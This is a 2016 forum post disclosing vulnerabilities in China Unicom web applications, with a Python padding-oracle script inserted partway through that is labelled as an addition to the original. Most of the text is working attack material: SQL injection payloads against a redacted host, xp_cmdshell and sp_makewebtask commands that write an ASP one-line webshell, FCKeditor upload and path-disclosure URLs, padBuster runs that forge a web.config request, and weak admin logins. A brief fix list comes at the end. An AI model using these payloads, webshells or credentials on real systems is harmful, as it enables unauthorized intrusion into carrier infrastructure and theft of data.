HanDs
Administrator

[July vulnerability disclosure] Carrier security: multiple China Unicom vulnerabilities bundled (manual injection case study)

While learning, follow the relevant national laws and regulations; hackers do no evil. Without cybersecurity there is no national security.


A sad little vulnerability...

Details:

#1 SQL injection

#1.1 Proof that http://**.**.**.**/ belongs to China Unicom

1-0.png



#1.2 Injection point and manual injection walkthrough

Code:
POST /zsk/modules/query_chemi.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/zsk/modules/query_chemi.aspx
Cookie: ASP.NET_SessionId=mm3phznvzutfkvpbcfuf5t11
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 688

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTQ5MjMyMjg0MQ9kFgICAw9kFgICAQ9kFhICBw88KwARAgAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZAEQFgAWABYAZAIJDw8WBB4LQ29tbWFuZE5hbWUFATEeB1Zpc2libGVoZGQCCw8PFgQfAgUBMR8DaGRkAg0PDxYEHwIFATIfA2hkZAIPDw8WBB8CBQEwHwNoZGQCEQ8PFgQeBFRleHQFCeesrCAxIOmhtR8DaGRkAhMPDxYEHwQFCeWFsSAwIOmhtR8DaGRkAhUPDxYEHwQFEuaAu%2BWFsSAwIOadoeiusOW9lR8DaGRkAhcPEGQQFQAVABQrAwAWAGQYAQUJR3JpZFZpZXcxDzwrAAwBCGZkr%2Boq2PI%2FFttoRcE4FVUv4XZxwV1K%2B9h0LLmKvkRAHtU%3D&__EVENTVALIDATION=%2FwEWCQL32aavCALw7PDJCALx7PDJCALy7PDJCALz7PDJCAL07PDJCALEhISFCwLdkpmPAQLP%2FqqSD2bBx516y2DQPGYn6nuzTIrt8f2RChkdXX6RV6E7s%2Bp2&ddlSort=1&txtName=1%' and '%'=' &btnOK=%E6%A3%80+%E7%B4%A2



Injection point: txtName

Union injection PoC:

Code:
1%' order by 7--    determine the column count
1%' union select null,db_name(),@@version,system_user,null,host_name(),null--    pull data



1-3.png



DBA privileges

Code:
1%' and 1=(select IS_SRVROLEMEMBER('sysadmin'))--



1-2.png



System commands can be executed

Code:
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 3:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . : **.**.**.**



Code:
Directory of D:\

2014-07-18 03:01 <DIR> 9ebaf80b4e53708f8a66ce71606833
2016-01-04 14:07 <DIR> ac
2016-05-28 00:00 <DIR> acbackup
2013-12-16 14:44 125,414,912 ACCT_900.bak
2014-03-31 10:55 141,642,240 He�SalesControlUnicom201R0331.bak
2015-04-01 14:23 35,651,584 HTCIP.mdf
2015-04-01 14:23 86,441,984 HTCIP_1.ldf
2013-11-09 16:25 27,596,288 HTCIP_backup_201308290000.bak
2013-08-29 11:38 5,859,840 lt_pos_lbs.bak
2013-08-29 00:00 1,526,272 Middleware_hbtj_backup_201308290000.bak
2014-03-21 12:_7 <DIR> Sqldata
2014-11-22 09:49 24,205 SQLQuery1联通更新2014.8.11.sql
2014-03-21 10:38 <DIR> Test
2013-08-29 11:38 34R,078,272 UNICOM_LBS.bak
2014-04-02 09:25 702,121,472 UNICOM_LBS_201R0225.bak
2013-11-13 23:01 3,388,858 zjkajtbz.zip
2015-06-30 10:49 <DIR> 数据库备份
2014-11-22 10:05 43,425 权_.sql
12 File(s) 1,474,789,352 bytes
6 Dir(s) 524,787,335,168 bytes free



#1.3 Finding the web root, with the goal of writing a one-line webshell

First, I tried sqlmap's --os-shell. It failed, reporting that stacked queries are not supported, yet manual testing showed they work; let's find another way first.

Then I noticed the site has an FCKeditor and the server is IIS 6.0. Can the IIS parsing vulnerability be used to write a backdoor?

Code:
http://**.**.**.**/zsk/fckeditor/editor/dialog/fck_about.html    version 2.6.3
http://**.**.**.**/zsk/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2F**.**.**.**%2Fzsk%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx    find the FCKeditor directory
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder    create a .asp directory and upload a jpg into it, to trigger directory parsing
http://**.**.**.**/zsk/upload/image/asp.asp/wy.jpg
http://**.**.**.**/zsk/upload/image/wy.asp;wy(1).jpg
Neither gets parsed, oddly. My guess is that the server has script execution disabled.



But the FCKeditor path disclosure gives us the site's physical path

Code:
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/    path disclosure
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/



Confirmed path:

1-4.png



#1.4 Writing the one-line webshell by hand

Code:
Two ways
1%'; exec sp_makewebtask 'D:\ac\wy.txt',' select ''<%execute(request("a"))%>'' ';--
1%'; exec sp_makewebtask 'C:\sjz\zsk\system\wy.txt',' select ''<%execute(request("a"))%>'' ';--

1%'; exec xp_cmdshell 'echo "<%execute(request("value"))%>">>D:\ac\hello.txt';--
1%'; exec xp_cmdshell 'echo "<%execute(request("value"))%>">>C:\sjz\zsk\system\hello.txt';--



Result:

Code:
Directory of D:\ac

2016-05-29 20:45 <DIR> .
2016-05-29 20:45 <DIR> ..
2016-05-29 20:45 33 hello.txt
2016-05-29 20:15 408 wy.txt
2014-06-11 15:09 616 [message].txt
2014-06-11 15:09 7,559 张家口数据库修改20140610.sql
2014-01-02 17:04 3,200,082 救援资源Data20140102.zip
2014-06-20 12:31 <DIR> 数据库备份20140620
2014-06-09 15:26 996 新建 文本文档.txt
2014-06-20 11:32 224 查询图片.sql
2014-01-02 19:04 5,481,382 知识.zip
2014-01-02 18:36 10,610 石家庄自查自报数据库修改.sql
2014-03-26 09:52 4,825 脚本.zip
10 File(s) 8,706,735 bytes
3 Dir(s) 524,785,500,160 bytes free



The D: drive is writable, but the C: web root looks write-protected; the statement failed. Tragic...

#2 Padding Oracle Attack

Code:
padBuster.pl http://**.**.**.**/zsk/WebResource.axd?d=FEPWE03guUt5kpUQHEAucw2 FEPWE03guUt5kpUQHEAucw2 16 -encoding 3 -plaintext "|||~/web.config"



Code:
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@**.**.**.** |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 404 2289 N/A
2 ** 255 500 4894 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (93/256) [Byte 16]
[+] Success: (154/256) [Byte 15]
[+] Success: (150/256) [Byte 14]
[+] Success: (54/256) [Byte 13]
[+] Success: (192/256) [Byte 12]
[+] Success: (207/256) [Byte 11]
[+] Success: (153/256) [Byte 10]
[+] Success: (118/256) [Byte 9]
[+] Success: (71/256) [Byte 8]
[+] Success: (4/256) [Byte 7]
[+] Success: (228/256) [Byte 6]
[+] Success: (246/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (27/256) [Byte 3]
[+] Success: (78/256) [Byte 2]
[+] Success: (227/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 71c1971d296093d2ac03582ba80003a3
[+] Intermediate Bytes (HEX): 0dbdeb630617f6b082603745ce6964a2

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: ccGXHSlgk9KsA1grqAADowAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------



Code:
Bruter.pl http://**.**.**.**/zsk/ScriptResource.axd ccGXHSlgk9KsA1grqAADowAAAAAAAAAAAAAAAAAAAAA1 16



Code:
Total Requests:101

Resulting Exploit Block:WLwionz9NMbfVXcCwv2UuHHBlx0pYJPSrANYK6gAA6MAAAAAAAAAAAAAAAAAAAAA0



Code:
http://**.**.**.**/zsk/ScriptResource.axd?d=WLwionz9NMbfVXcCwv2UuHHBlx0pYJPSrANYK6gAA6MAAAAAAAAAAAAAAAAAAAAA0
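What padBuster's encrypt mode did above, as an added example that is not code from the original post or from padBuster: a CBC padding oracle driven only by the server's accept/reject verdict (the 404-versus-500 split in the response analysis), used to recover the intermediate bytes of a chosen all-zero last block and so build a ciphertext for "|||~/web.config" without the key, followed by the .NET UrlToken encoding (padBuster's -encoding 3) that turns those bytes into the d= value. The block cipher here is a toy HMAC-based Feistel network and the key is a made-up constant (both assumptions, so the file runs without third-party libraries); the attack functions never read the key, so they apply unchanged to AES-CBC. The ASP.NET flaw this exploited was fixed by Microsoft in MS10-070.

```python
"""CBC padding-oracle attack in the style of padBuster (added example, not the
post's code). Toy HMAC-Feistel block cipher and KEY are assumptions; the attack
functions only ever call oracle() and never read KEY, so they apply to AES-CBC."""
import base64, hashlib, hmac

BLOCK, ROUNDS = 16, 4
KEY = b"demo-server-secret-key"  # server secret (assumption), unknown to the attacker

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # Feistel round function: 8 bytes of keyed SHA-256
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):  # token layout: IV || C1 || ... || Cn
    out, prev = [iv], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, token):
    return b"".join(_xor(block_decrypt(key, token[i:i + BLOCK]), token[i - BLOCK:i])
                    for i in range(BLOCK, len(token), BLOCK))

def oracle(token):
    """Server side: True on good padding (the post's 404 signature), False on a
    padding error (the 500 signature). That distinguishable answer is the bug."""
    try:
        unpad(cbc_decrypt(KEY, token))
        return True
    except ValueError:
        return False

def recover_intermediate(block):
    """Recover D_KEY(block) one byte at a time: padBuster's 'Intermediate Bytes'."""
    inter, prev = bytearray(BLOCK), bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        for known in range(pos + 1, BLOCK):
            prev[known] = inter[known] ^ padval  # solved tail now decrypts to padval
        for guess in range(256):
            prev[pos] = guess
            if not oracle(bytes(prev) + block):
                continue
            if pos == BLOCK - 1:  # a 02 02 (or longer) run also passes; a true 01 hit
                prev[pos - 1] ^= 1  # survives a flip of the byte before it
                still_valid = oracle(bytes(prev) + block)
                prev[pos - 1] ^= 1
                if not still_valid:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError(f"no padding hit for byte {pos}")
    return bytes(inter)

def decrypt_with_oracle(token):  # padBuster decrypt mode
    return unpad(b"".join(_xor(recover_intermediate(token[i:i + BLOCK]), token[i - BLOCK:i])
                          for i in range(BLOCK, len(token), BLOCK)))

def forge_with_oracle(plaintext):
    """padBuster encrypt mode: start from an all-zero last block (as in the post's
    output) and prepend, for each plaintext block P, the block I(next) XOR P."""
    padded, token = pad(plaintext), bytes(BLOCK)
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        token = _xor(recover_intermediate(token[:BLOCK]), padded[i:i + BLOCK]) + token
    return token

def urltoken_encode(data):
    """HttpServerUtility.UrlTokenEncode (padBuster -encoding 3): URL-safe base64,
    '=' padding stripped and its count appended as a digit."""
    b64 = base64.b64encode(data).decode()
    body = b64.rstrip("=")
    return body.replace("+", "-").replace("/", "_") + str(len(b64) - len(body))
```

Usage: `forge_with_oracle(b"|||~/web.config")` returns 32 bytes whose second half is all zeros, exactly the shape of the post's result (one recovered block followed by the zero block), and `urltoken_encode` of it gives a d= value of the same form; feeding the post's own hex block 71c1971d296093d2ac03582ba80003a3 plus sixteen zero bytes to `urltoken_encode` reproduces the string padBuster printed. `decrypt_with_oracle` is the other direction, recovering the plaintext of a captured token. Both directions cost at most 256 oracle requests per byte, which is the (N/256) count padBuster shows per byte above.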



#3 Weak passwords into the admin backend

Code:
http://**.**.**.**/zsk/system/login.aspx admin\123456
http://**.**.**.**/sjzjcxxgl/LoginWXY.aspx admin\admin
http://**.**.**.**/sjzxinxi/SysManage/Login.aspx admin\123456



No screenshots; it is easy to test.

Proof of vulnerability:

#1 SQL injection

1-1.png



#2 Padding Oracle Attack

1-5.png

Fix recommendations:

1. Padding Oracle vulnerability: install the official Microsoft patch;

2. Filter SQL injection; there are many injectable spots, which I won't list one by one. Please hunt them down;

3. Change the weak passwords;

4. You are the professionals here


Posted: 2016-7-16   |   Views: 0   |   Replies: 0